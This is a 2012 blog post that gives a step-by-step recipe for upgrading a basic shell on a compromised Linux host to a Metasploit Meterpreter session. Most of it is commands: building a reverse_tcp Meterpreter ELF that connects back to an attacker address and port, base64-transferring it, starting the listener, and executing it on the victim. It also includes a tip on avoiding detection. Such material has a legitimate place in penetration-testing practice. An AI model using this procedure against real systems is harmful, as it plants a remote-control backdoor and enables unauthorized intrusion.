Wednesday, May 2, 2012

Upgrading To Meterpreter.... Backdoor on Linux




I've been getting back into Metasploit recently and was pleasantly surprised at a lot of the new features. Meterpreter stands out as a pretty cool function and it's even cooler that if you have an exploit that isn't compatible with the meterpreter stage right off that you can upgrade to it...if you get a shell on a win32 system.

Simply run 'sessions -u ' and your session gets updated from a simple win32 shell to meterpreter.

On Linux however this isn't supported (yet?). If you can only get a simple shell there isn't a built-in way to upgrade the shell but it is possible to do it manually. I found references to this a couple places but couldn't find anyone who had documented the steps (or maybe my Google f00 isn't what it used to be).

So without further ado, here we go:
Get yourself a shell on your remote Linux box

Compile your payload

# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=12345 R | msfencode -t elf -o metarev


This compiles the reverse_tcp payload to connect back to 192.168.1.10 on port 12345 and then encodes the payload as a Linux ELF binary and outputs it to 'metarev'

Base64 encode the binary so you can copy it over. Alternatively you could pull down the payload from a server you have setup elsewhere but this isn't always possible and increases the likelihood your attack will be detected.

base64 metarev > b64_metarev

 Get your local system ready for the reverse shell (in msfconsole).

> use exploit/multi/handler

> set payload linux/x86/meterpreter/reverse_tcp

> set LHOST 192.168.1.10

> set LPORT 12345

> exploit -j

Get back into your basic shell session and copy over the payload, decode it and execute it. We'll use cat to open the file,
send the encoded data via stdin and then close the file by sending an EOF on a newline.

cat > b64_metarev << EOF

(send base64 encoded binary)

EOF (on a newline!)

> base64 -i -d b64_metarev > metarev (you need the -i to ignore garbage characters or else the binary will be corrupt)

> chmod +x metarev

> ./metarev

You should now see the shell connect back to you and send the intermediate stager, send the full meterpreter stage and then execute it.

Back out of your basic shell with Ctrl+Z, check 'sessions -l' to see your shiny new meterpreter session!



Note: The payload with segfault if there isn't a listener running on your LHOST and the basic shell won't show this, successful execution of the payload looks exactly the same as a failure.

So there you go. Meterpreter still is much more useful on a Windows machine (vs a win32 shell) but a good thing to keep on had should you need it on a Linux machine too.

No comments:

Post a Comment